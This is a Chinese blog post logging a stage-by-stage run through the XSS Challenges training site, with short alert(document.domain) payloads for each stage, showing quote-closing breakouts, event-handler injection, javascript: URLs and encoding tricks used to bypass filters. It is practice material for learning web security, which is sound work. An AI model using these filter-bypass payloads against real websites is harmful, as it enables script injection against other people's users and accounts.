xss challenge通关记录

最新推荐文章于 2021-06-18 20:36:35 发布
最新推荐文章于 2021-06-18 20:36:35 发布
阅读量230 收藏 1
点赞数
分类专栏: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50597969/article/details/115832218
版权

xss challenge通关记录

Stage #1

在这里插入图片描述

//第一关没有任何过滤直接搞
<script>alert(document.domain);</script>

Stage #2

在这里插入图片描述

在这里插入图片描述

//需要闭合
"><script>alert(document.domain);</script>

Stage #3

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

抓包修改p2的值(选择国家那个地方

<script>alert(document.domain)</script>

在这里插入图片描述
在这里插入图片描述

Stage #4

在这里插入图片描述
发现有一个p3值是被隐藏了
在这里插入图片描述
在这里插入图片描述

"><script>alert(document.domain)</script><"

在这里插入图片描述

Stage #5

在这里插入图片描述
长度被限制了。。
修改这里👇之后再传入payload即可(记得闭合前边

在这里插入图片描述

Stage #6

在这里插入图片描述
在这里插入图片描述

>被过滤了
直接再value内利用onclick事件

"οnclick=alert(document.domain);name="/

Stage #7

在这里插入图片描述
与上一关相似.

" onclick=alert(document.domain)
//空格可以分割属性

在这里插入图片描述

Stage #8

在这里插入图片描述
这关是将输入的东西整到a标签中

在这里插入图片描述

javascript:alert(document.domain)

在这里插入图片描述

Stage #9

在这里插入图片描述
要用到utf-7编码。。。先略了

Stage #10

在这里插入图片描述
这关把domain过滤了,尝试一下双写

"><script>alert(document.domdomainain)</script>

Stage #11

不知道为啥打不开了。先略.

Stage #12

在这里插入图片描述
ie浏览器会把``(键盘左上横排数字的最左边用英文输入法)识别为双引号(<>被过滤就设置属性),构造payload。

``onclick=alert(document.domain)  //但是并未成功

Stage #13

在这里插入图片描述
未过。。

参考资料

Stage #14

在这里插入图片描述

background-color:salmon;input:e/**/xpression((window.x==1)?'':(window.x=1,alert(document.domain)))//dalao的payload

未成功 。。

Stage #15

在这里插入图片描述

进行16进制转换或者Unicode编码

\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

Stage #16

打不开。。

Stage #17

在这里插入图片描述
只能在老版ie上可以成功。。直接看dalao的wp吧

在这里插入图片描述

Stage #18

在这里插入图片描述
依旧老ie。。

在这里插入图片描述

%A2%BE%BCscript%BEalert(document.domain);%BC/script%BE//dalao的payload

Stage #19

在这里插入图片描述
在twitter上找 DomXss at Sep 24,2010 。。

T0mrvvi1b3t
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss challenge 下载 xss 实践通小游戏,以闯的形式检验xss掌握程度。
04-27
xss challenge 下载 xss 实践通小游戏,以闯的形式检验xss掌握程度。
xss challenges平台学习
weixin_30731287的博客
04-13 189
虽然在很早之前就接触过xss,有一段时间还就着一本书研究过,但是始终没有实感,掌握的也不够系统,所以现在借着这几个平台再学习一遍 首先来玩一玩xss challenge平台 第一:http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9    第二:http://xss-quiz....
XSS挑战之xss-challenge
yy
03-14 5249
目录 一. 描述 二. 通 level 1 level2 level3 终极测试代码 level4 level5 level6 level7 level8 level9 level10 一. 描述 xsschange是一个xss过滤的绕过通靶场,总共有20,通过其可以进行练习如何绕过xss的过滤。将文件放在网站目录下进行访问即可,如下 下载地址:传送门 -》xss-challenge 二. 通 level 1 点击图片进入第一1,看到,通过get的方式进行
24、渗透测试经验分享(一)_jquerydomxss_burpsuite_AngularJsXSS_20191127
__Qian的博客
11-27 855
1、burp 有csrf功能,可以构造CSRF POC 2、jquery domxss脚本 1.11.3 jquerydomexss1.6.1 <html> <head> <title>jQuery DomXSS test</title> <script type="text/javascript" src="...
365xav.cf/forum.php,jupyterlab-latex
weixin_29885875的博客
03-29 9万+
# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY.# yarn lockfile v1"@babel/code-frame@^7.0.0":version "7.8.3"resolved "https://registry.yarnpkg.com/@babel/code-frame/-/code-frame-7.8.3....
http://95u.free.fr/index.php,Electronic Software Distribution Service
热门推荐
weixin_39632291的博客
03-19 38万+
Content-Type: multipart/related; start=; boundary=----------OH5LlQ9dynBJGqR8E2AiMRContent-Location: https://software.pitt.edu/software/software.aspSubject: =?utf-8?Q?Electronic=20Software=20Distributi...
xss-labs靶场通
10-13
xss-labs靶场通
xss-lab全通教程
05-07
xss-lab全通教程,共有20个,全部就压缩到文件里,另外购买还有可以私信博主,赠送xss环境
xss-vuln学习通总结
08-24
个人总结类文档。
xss-labs-master.zip(xss注入通游戏/靶场)
03-21
经典的xss注入通游戏,搭建简单。适合网络安全测试人员
web渗透--47--基于DOMXSS跨站
武天旭的博客
09-22 1744
1、漏洞描述 文档对象模型(Document Object Model),即DOM。是用来在浏览器中表示文件的结构格式。DOM支持动态脚本,诸如JavaScript来引用文档组件,如表单字段或会话cookie。DOM也用于浏览器的安全,例如限制在不同域的脚本获取其它域的cookie会话。当活动内容(如JavaScript函数)被特制的请求修改时,可能会出现基于DOMXSS漏洞,这样能够使得攻击者可以控制DOM元素。
<failure xmlns="urn:ietf:params:xml:ns:xmpp-sasl"><not-authorized/></failure>
影子的专栏
07-23 3万+
在使用XMPPFramework的例子iPhoneXMPP时,使用ip地址,怎么也登录不进去。 2013-07-23 09:35:37:396 iPhoneXMPP[6666:c07] iPhoneXMPPAppDelegate: xmppStreamDidDisconnect:withError: 2013-07-23 09:35:37:396 iPhoneXMPP[66
zseob6jv7jq3dz.html,Open H.323 — [OpenH323]Intel codecs G729 A AB B, G723.1 6.3, G723.1 5.3 plugin f...
weixin_30591519的博客
06-18 16万+
------------61301EA571264FContent-Type: text/plain; charset=Windows-1251Content-Transfer-Encoding: 8bitHello all,Extract archive and compile Audio Plugin "IntelCodecs" in MS VisualStudio .NET 2003. To...
XSS Challenges
weixin_30950887的博客
08-21 192
Stage #1:http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9 Hint: very simple... 按照要求输入<script>alert(document.domain);</script> 过 Stage #2http://xss-quiz.int21h...
DomXSS以及绕过浏览器检测机制方法总结
安全汪
06-27 8900
今天继续研究了一下PKAV“心伤的瘦子”的XSS系列教程,收获挺大的,这里主要记录下来,以备忘记! 下面是这个系列教程的截图,可以在这里看到,当让,每一个知识知识点,都可以在这里(传送门)得到复现。作为程序员,会让你意思到自己以前的编码方式中有诸多的不足,作为安全研究者,深深地感觉到,原来还可以这么玩….昨天的知识点忘记整理了,先吧今天的写上,以后再补: **DOM_XSS之iframe标签的变
基于matlab实现的一种新型的配电网潮流计算,基于前推回代法
05-03
基于matlab实现的一种新型的配电网潮流计算,基于前推回代法,并附有10kv配电网数据,利用新的判别手段,成功解决配电网不收敛的问题.rar
node-v5.3.0.tar.xz
最新发布
05-03
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
ASP+ACCESS网上园林设计(源代码+设计说明书).zip
05-03
ASP+ACCESS网上园林设计(源代码+设计说明书).zip
2023-04-06-项目笔记 - 第一百二十二阶段 - 4.4.2.120全局变量的作用域-120 -2024.05.03
05-03
2023-04-06-项目笔记-第一百二十二阶段-课前小分享_小分享1.坚持提交gitee 小分享2.作业中提交代码 小分享3.写代码注意代码风格 4.3.1变量的使用 4.4变量的作用域与生命周期 4.4.1局部变量的作用域 4.4.2全局变量的作用域 4.4.2.1全局变量的作用域_1 4.4.2.120全局变量的作用域_120 - 2024-05-03
pikachu靶场xss漏洞通
08-10
你好!要通Pikachu靶场的XSS漏洞,你可以按照以下步骤进行操作: 1. 首先,了解XSS漏洞的原理和类型。XSS(跨站脚本攻击)是一种常见的Web漏洞,攻击者通过在网页中注入恶意脚本,利用用户的浏览器执行恶意代码,从而获取用户的敏感信息或进行其他恶意操作。 2. 进入Pikachu靶场的XSS卡。你可以在Pikachu靶场网站上找到XSS卡,并点击进入。 3. 分析目标网页的源代码。查看目标网页的源代码,找到用户输入的地方,这些地方可能存在漏洞。 4. 尝试注入恶意脚本。在目标输入框或其他用户可输入的地方,尝试注入一些简单的恶意脚本,例如 `<script>alert('XSS')</script>`。如果成功弹出一个对话框,说明存在XSS漏洞。 5. 利用XSS漏洞进行更高级的攻击。一旦确认存在XSS漏洞,你可以尝试利用它进行更高级的攻击,例如窃取用户的Cookie信息、进行钓鱼攻击等。这需要根据具体情况来进行进一步的研究和尝试。 请注意,在进行任何形式的安全测试时,确保遵守法律和道德准则,并且只在合法授权的范围内进行。希望这些信息对你有所帮助!如果你有任何其他问题,可以继续向我提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值